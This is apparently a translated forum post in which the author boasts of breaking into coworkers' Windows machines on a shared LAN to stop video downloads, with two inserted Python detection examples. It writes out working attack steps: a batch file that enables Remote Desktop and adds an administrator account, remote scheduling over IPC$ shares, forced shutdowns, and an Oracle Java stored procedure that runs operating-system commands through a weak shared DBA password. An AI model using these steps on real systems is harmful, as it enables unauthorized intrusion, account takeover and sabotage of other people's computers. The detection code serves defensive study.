Recently the network speed has been awful ......
"Internet access for all, never download with BT!" That is the rule of this LAN! Sadly, a lot of folks are downloading anyway, and it is all bad TV series. A few GB here, dozens of GB there; how can a 10 M link withstand that kind of abuse!
Fortunately, their security awareness is not very good. The day before yesterday, through the default hidden shares, I dropped the following batch file, mstsc.bat, onto the C drive of some folks in another segment:
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    net user test /add
    net localgroup administrators test /add

The three commands above:
1. Enable Remote Desktop
2. Add a user name/password: Test/test
3. Add test to the Administrator Group
My LAN machines here are all Windows 2003 and the logon window is:
They do not seem to have much security awareness, so I didn't bother adding anything to hide the user, and then used the following commands to take over quickly:
    C:\> net use \\192.168.3.46\IPC$ " /User:Administrator
    The command is successfully completed.

    C:\> net time \\192.168.3.46
    \\192.168.3.46 the current time is
    The command is successfully completed.

    C:\> at \\192.168.3.46 :16 c:\windows\system32\mstsc.bat
    A new job is added. Its job ID is 2.
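Seen from the defending side, the batch file leaves three distinctive command lines on the target within seconds of each other. The following is an added example, not code from the original post: it correlates those three steps per host. The records, host names and timestamps are constructed, and `find_takeover_chains` is a hypothetical helper name.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records (time, host, command line); not from the post.
SAMPLE = [
    ("2010-01-01 10:16:00", "PC-46", r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet'
     r'\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("2010-01-01 10:16:01", "PC-46", "net user test /add"),
    ("2010-01-01 10:16:01", "PC-46", "net localgroup administrators test /add"),
    # Benign look-alikes: RDP being switched off, and an unrelated account creation.
    ("2010-01-01 11:00:00", "PC-47", r'reg add "HKLM\SYSTEM\CurrentControlSet'
     r'\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'),
    ("2010-01-01 11:00:05", "PC-47", "net user intern /add"),
    # The same kinds of step spread over hours: outside the correlation window.
    ("2010-01-01 08:00:00", "PC-48", r'reg add "HKLM\SYSTEM\CurrentControlSet'
     r'\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("2010-01-01 09:30:00", "PC-48", "net user helpdesk /add"),
    ("2010-01-01 12:45:00", "PC-48", "net localgroup administrators helpdesk /add"),
]

RULES = {
    "rdp_enabled": re.compile(
        r"\breg(\.exe)?\s+add\b.*Terminal Server.*fDenyTSConnections.*/d\s+0\b", re.I),
    "user_added": re.compile(r"\bnet1?(\.exe)?\s+user\s+(?P<user>\S+).*?/add\b", re.I),
    "admin_added": re.compile(
        r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+(?P<user>\S+)\s+/add\b", re.I),
}

def find_takeover_chains(records, window=timedelta(seconds=60)):
    """Return (host, first_seen, users) where all three steps fall inside `window`."""
    hits = {}  # host -> [(time, rule name, user or None)]
    for ts, host, cmd in records:
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        for rule, rx in RULES.items():
            m = rx.search(cmd)
            if m:
                hits.setdefault(host, []).append((when, rule, m.groupdict().get("user")))
    alerts = []
    for host, events in hits.items():
        events.sort(key=lambda e: e[0])
        for i, (start, _, _) in enumerate(events):
            in_window = [e for e in events[i:] if e[0] - start <= window]
            if {e[1] for e in in_window} == set(RULES):
                created = {e[2].lower() for e in in_window if e[1] == "user_added"}
                promoted = {e[2].lower() for e in in_window if e[1] == "admin_added"}
                # Report accounts that were both created and made administrator.
                alerts.append((host, start, sorted(created & promoted)))
                break
    return alerts
```

Only PC-46 is reported, with the account `test`; the other two hosts show single steps or steps too far apart to be one batch run.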
Is there a machine waiting for me? People who are not good at watching TV series ......
I won't talk about it if I fix it.
Afterwards, Win + R, mstsc, and logging in as test gets into the machine successfully (of course, you could also log on as Administrator; I created a separate user in case he changes his password and I have to do the work all over again ......)
He installed the traffic monitoring software on his computer. First, let's set a traffic limit. Then whoever is downloading gets this:

    shutdown -s -c ", don't download it ...... Go home, wife, children, hot cakes, OK ?" -t 10

If he doesn't run shutdown -a, he can wait for the shutdown!
Then we performed the above operations in batches, and things really got much better ......
Some of the guys in the 192.168.3.x segment were hit, and then their segment came back again ......
Maybe it was rendered. This guy actually changed his password, and the shares were completely closed. The traffic was high. Didn't he undo it ?!
Why should I use Oracle to learn Java? I don't think Oracle will let you plant it, will it?
Because the machines here were all installed from the same image, all the Oracle passwords are the same, and the account has DBA privileges!
First I tried the approach of calling msvcrt.dll, from brother Mickey:
It failed with an error while calling the library file. The explanations online all point to listener.ora and tnsnames.ora. What to do? If I could get onto his computer to modify the Oracle configuration files, why would I be going to all this trouble?
The final method is as follows:
Since it is a weak password, I directly used PL/SQL Developer (Oracle development software, widely available online) to connect to the Oracle service on his computer.
Connect to Oracle on his computer and open an SQL window ...... Then:
Step 1: Create a Java source that executes cmd. Once you have learned some Java you will understand what this code does; it is very simple.
    create or replace and compile java source named "util" as
    import java.io.*;
    import java.lang.*;
    public class util extends Object
    {
      public static int runthis(String args)
      {
        Runtime rt = Runtime.getRuntime();
        int rc = -1;
        try
        {
          Process p = rt.exec(args);
          int bufsize = 4096;
          BufferedInputStream bis = new BufferedInputStream(p.getInputStream(), bufsize);
          int len;
          byte buffer[] = new byte[bufsize];
          // Echo back what the program spit out
          while ((len = bis.read(buffer, 0, bufsize)) != -1)
            System.out.write(buffer, 0, len);
          rc = p.waitFor();
        }
        catch (Exception e)
        {
          e.printStackTrace();
          rc = -1;
        }
        finally
        {
          return rc;
        }
      }
    }
Step 2: Create a function to call this code

    create or replace function run_cmd(f_cmd in varchar2) return number
    as language java
    name 'util.runthis(java.lang.String) return integer';

Step 3: Create a procedure that calls this function

    create or replace procedure RC(p_cmd in varchar2)
    as
      x number;
    begin
      x := run_cmd(p_cmd);
    end;
Switch to the command prompt on your own computer:
1. Connect:

    sqlplus system/password@<IP>:<port number>/<data service name>

2. Execute the following:

    variable x number;
    set serveroutput on;
    exec dbms_java.set_output(100000);
    grant policyspriv to system;

3. The intrusion code:

    exec :x := run_cmd('cmd /c cmd command');

It's all done. You can do whatever you want now: open a backdoor or something ......
Shown below:
Got into his computer ...... gave him a warning! Back to studying ......
Of course, after the attack was completed, all the Java sources, functions and stored procedures left in Oracle were deleted, so nothing was left behind!
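When reviewing a database for the pattern built in steps 1 to 3, the useful question is which PL/SQL entry points end up in a Java class that spawns OS processes. The following is an added example, not the post's code: the DDL strings are constructed and abridged from the three steps above, and `os_exec_entry_points` is a hypothetical helper name.

```python
import re

# Constructed DDL texts modelled on steps 1-3 (abridged), plus one harmless function.
DDL = [
    'create or replace and compile java source named "util" as '
    "public class util { public static int runthis(String args) throws Exception { "
    "Process p = Runtime.getRuntime().exec(args); return p.waitFor(); } }",
    "create or replace function run_cmd(f_cmd in varchar2) return number as "
    "language java name 'util.runthis(java.lang.String) return integer';",
    "create or replace procedure RC(p_cmd in varchar2) as x number; "
    "begin x := run_cmd(p_cmd); end;",
    "create or replace function add_tax(p in number) return number as "
    "begin return p * 1.2; end;",
]

JAVA_SRC = re.compile(
    r'create\s+(?:or\s+replace\s+)?(?:and\s+\w+\s+)?java\s+source\s+named\s+"?([\w$]+)"?', re.I)
PLSQL = re.compile(r"create\s+(?:or\s+replace\s+)?(?:function|procedure)\s+(\w+)", re.I)
CALL_SPEC = re.compile(r"language\s+java\s+name\s+'\s*([\w$.]+)\.\w+\s*\(", re.I)
OS_EXEC = re.compile(r"\.exec\s*\(|ProcessBuilder", re.I)

def os_exec_entry_points(ddl_texts):
    """Return PL/SQL unit names that reach a Java source calling exec()/ProcessBuilder."""
    exec_classes, bodies, reach = set(), {}, set()
    for text in ddl_texts:
        src = JAVA_SRC.search(text)
        if src:
            if OS_EXEC.search(text):
                exec_classes.add(src.group(1).lower())
            continue
        unit = PLSQL.search(text)
        if unit:
            bodies[unit.group(1).upper()] = text
    for name, text in bodies.items():  # call specs bound directly to a flagged class
        spec = CALL_SPEC.search(text)
        if spec and spec.group(1).split(".")[-1].lower() in exec_classes:
            reach.add(name)
    changed = True
    while changed:  # then follow PL/SQL wrappers that call an already-flagged unit
        changed = False
        for name, text in bodies.items():
            if name in reach:
                continue
            if any(re.search(rf"\b{re.escape(r)}\s*\(", text, re.I) for r in reach):
                reach.add(name)
                changed = True
    return sorted(reach)
```

For the constructed input this returns `['RC', 'RUN_CMD']` and leaves `add_tax` out. Because the post's author drops these objects afterwards, the review has to run over DDL recorded at execution time (for example an audit trail that keeps statement text), not only over the objects still present.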